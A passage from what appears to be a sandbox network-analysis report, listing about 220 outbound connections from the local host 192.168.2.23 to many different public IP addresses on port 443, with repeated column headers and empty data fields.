                                          12429192.168.2.2333388179.191.159.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12430192.168.2.234991478.62.73.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12431192.168.2.234105474.183.48.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12432192.168.2.2337698126.98.154.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12433192.168.2.2332984209.244.90.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12434192.168.2.234587496.157.132.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12435192.168.2.234718499.91.27.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12436192.168.2.2335788168.70.199.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12437192.168.2.2353016184.27.211.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12438192.168.2.2351240154.94.213.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12439192.168.2.2354084133.51.52.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12440192.168.2.234915213.160.75.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12441192.168.2.2332784111.90.208.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12442192.168.2.2340008171.133.161.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12443192.168.2.233897647.108.112.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12444192.168.2.2348148113.36.94.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12445192.168.2.2360312134.207.166.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12446192.168.2.234288869.239.159.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12447192.168.2.233298891.49.195.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12448192.168.2.2359396126.221.178.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12449192.168.2.2339716200.89.107.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12450192.168.2.234713852.39.225.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12451192.168.2.2334314122.249.81.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12452192.168.2.233578670.246.86.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12453192.168.2.234353286.192.204.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12454192.168.2.235894444.246.221.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12455192.168.2.2347566171.42.237.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12456192.168.2.233687848.5.135.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12457192.168.2.2348536156.102.123.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12458192.168.2.2336638183.128.243.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12459192.168.2.2353768209.3.15.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12460192.168.2.2333566157.138.169.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12461192.168.2.2356648171.48.172.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12462192.168.2.234173043.233.206.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12463192.168.2.234354691.60.30.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12464192.168.2.2348620150.0.85.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12465192.168.2.2335854208.42.118.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12466192.168.2.2348296115.66.223.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12467192.168.2.233954047.44.137.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12468192.168.2.2346612133.209.156.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12469192.168.2.234776454.7.19.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12470192.168.2.233313453.195.209.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12471192.168.2.233880436.235.71.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12472192.168.2.2356252136.0.57.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12473192.168.2.235074234.70.174.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12474192.168.2.2338552209.201.248.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12475192.168.2.2344954186.138.168.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12476192.168.2.2334624177.90.88.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12477192.168.2.234784013.67.153.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12478192.168.2.23485205.212.160.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12479192.168.2.2351490211.151.30.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12480192.168.2.2338288158.88.160.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12481192.168.2.2359774195.117.136.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12482192.168.2.2339054139.117.180.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12483192.168.2.235175898.27.80.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12484192.168.2.2341196171.176.68.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12485192.168.2.234847057.158.76.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12486192.168.2.233501676.28.95.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12487192.168.2.2336468104.151.176.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12488192.168.2.235641674.24.153.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12489192.168.2.2352502139.234.231.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12490192.168.2.234323813.98.39.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12491192.168.2.235334291.183.172.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12492192.168.2.2346686199.124.16.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12493192.168.2.2348792110.61.181.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12494192.168.2.2341804170.124.250.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12495192.168.2.234676263.130.158.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12496192.168.2.233972285.165.171.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12497192.168.2.2333120138.149.175.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12498192.168.2.23587582.26.89.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12499192.168.2.2343306182.237.117.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12500192.168.2.233528866.207.75.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12501192.168.2.2344454108.228.166.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12502192.168.2.2353544201.132.61.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12503192.168.2.2348912165.171.6.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12504192.168.2.2353934120.149.77.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12505192.168.2.233635647.179.222.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12506192.168.2.235771836.215.58.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12507192.168.2.2353064131.78.124.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12508192.168.2.2358938113.183.37.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12509192.168.2.235629631.74.37.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12510192.168.2.233284851.82.206.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12511192.168.2.234171244.176.19.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12512192.168.2.2358142155.57.122.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12513192.168.2.2352882151.73.89.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12514192.168.2.233434097.37.84.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12515192.168.2.2336446103.225.239.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12516192.168.2.2343472210.231.165.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12517192.168.2.2336054206.192.5.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12518192.168.2.2338924154.66.21.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12519192.168.2.2346754185.90.204.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12520192.168.2.234647694.20.81.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12521192.168.2.2357346148.176.88.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12522192.168.2.235166272.241.34.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12523192.168.2.235419634.130.208.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12524192.168.2.2340598128.135.61.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12525192.168.2.234750861.225.172.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12526192.168.2.23494425.121.31.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12527192.168.2.2344704189.103.239.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12528192.168.2.233554681.148.240.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12529192.168.2.234389288.230.153.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12530192.168.2.233768445.137.83.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12531192.168.2.2351280151.189.142.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12532192.168.2.234226612.198.171.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12533192.168.2.2352500137.97.116.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12534192.168.2.23436882.59.80.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12535192.168.2.2349778109.173.172.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12536192.168.2.235078693.180.40.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12537192.168.2.2334416194.192.101.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12538192.168.2.2358200133.48.6.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12539192.168.2.235308869.161.254.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12540192.168.2.23345729.139.16.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12541192.168.2.235302451.131.42.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12542192.168.2.235105460.165.108.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12543192.168.2.2341306189.180.71.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12544192.168.2.2337294120.26.190.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12545192.168.2.235700025.142.200.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12546192.168.2.2348508191.25.247.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12547192.168.2.2334662116.187.197.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12548192.168.2.2348232180.1.245.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12549192.168.2.2354310191.208.44.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12550192.168.2.235069865.0.123.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12551192.168.2.2338034188.181.169.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12552192.168.2.2354478216.157.76.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12553192.168.2.2335064182.234.205.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12554192.168.2.2342306159.169.193.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12555192.168.2.2357070213.245.111.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12556192.168.2.23378644.159.89.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12557192.168.2.2339868169.69.238.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12558192.168.2.2351624191.45.230.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12559192.168.2.234272867.165.246.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12560192.168.2.234480243.19.65.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12561192.168.2.2360018129.104.26.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12562192.168.2.2346312118.51.113.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12563192.168.2.2334870223.63.215.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12564192.168.2.2358296187.86.245.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12565192.168.2.2343560153.250.47.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12566192.168.2.235917689.192.89.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12567192.168.2.234894823.46.184.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12568192.168.2.234741078.37.104.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12569192.168.2.234673483.85.207.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12570192.168.2.234529893.160.73.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12571192.168.2.2338860207.74.149.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12572192.168.2.234750665.51.104.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12573192.168.2.235040220.127.153.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12574192.168.2.234995052.220.125.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12575192.168.2.2352364126.110.246.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12576192.168.2.235384831.102.209.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12577192.168.2.2341904164.122.62.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12578192.168.2.2354346169.187.247.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12579192.168.2.234315649.177.234.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12580192.168.2.234497870.139.141.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12581192.168.2.234627698.11.156.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12582192.168.2.235345834.227.57.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12583192.168.2.2334434114.22.64.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12584192.168.2.234269252.119.209.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12585192.168.2.234756812.146.230.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12586192.168.2.23584582.79.246.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12587192.168.2.2358070155.96.141.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12588192.168.2.235618897.47.92.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12589192.168.2.235598645.204.3.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12590192.168.2.2357896120.211.82.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12591192.168.2.2335398109.69.50.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12592192.168.2.2354392132.193.145.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12593192.168.2.233680619.134.145.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12594192.168.2.234827479.133.248.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12595192.168.2.233307682.139.149.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12596192.168.2.2335888163.76.13.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12597192.168.2.2349614206.199.229.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12598192.168.2.2338708160.85.129.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12599192.168.2.234017685.103.132.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12600192.168.2.234269677.53.103.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12601192.168.2.234332431.243.82.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12602192.168.2.234745696.242.237.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12603192.168.2.23394941.149.142.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12604192.168.2.2345276182.127.190.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12605192.168.2.2360468163.13.14.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12606192.168.2.233315270.220.226.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12607192.168.2.235720859.1.237.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12608192.168.2.234939639.211.129.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12609192.168.2.233318896.134.220.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12610192.168.2.2360266185.167.26.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12611192.168.2.2355972133.237.5.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12612192.168.2.2360740103.68.18.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12613192.168.2.2336848175.75.67.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12614192.168.2.2357974128.145.48.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12615192.168.2.233418040.249.111.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12616192.168.2.2340100184.111.161.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12617192.168.2.2348254211.68.143.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12618192.168.2.2355076149.116.203.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12619192.168.2.2333236149.183.226.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12620192.168.2.2344600145.100.80.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12621192.168.2.235916265.223.85.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12622192.168.2.234381471.72.125.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12623192.168.2.235098418.251.96.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12624192.168.2.2360106182.82.160.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12625192.168.2.2356498181.144.194.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12626192.168.2.2359088184.244.176.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12627192.168.2.235951038.91.139.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12628192.168.2.234315864.1.48.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12629192.168.2.2347470155.189.166.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12630192.168.2.2350934135.169.192.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12631192.168.2.235077214.193.157.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12632192.168.2.234059232.175.211.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12633192.168.2.234046236.0.94.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12634192.168.2.2357946187.11.50.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12635192.168.2.235858839.184.219.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12636192.168.2.2350654128.23.147.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12637192.168.2.235067677.56.109.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12638192.168.2.2337504105.86.56.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12639192.168.2.2348964114.72.181.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12640192.168.2.2341180155.140.226.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12641192.168.2.2338100212.39.144.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12642192.168.2.234985470.82.132.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12643192.168.2.2356750188.196.84.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12644192.168.2.2350762198.163.237.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12645192.168.2.2342640119.180.117.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12646192.168.2.2360016131.101.69.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12647192.168.2.233495657.72.140.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12648192.168.2.234591273.150.20.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12649192.168.2.233369483.182.123.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12650192.168.2.2349594213.187.23.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
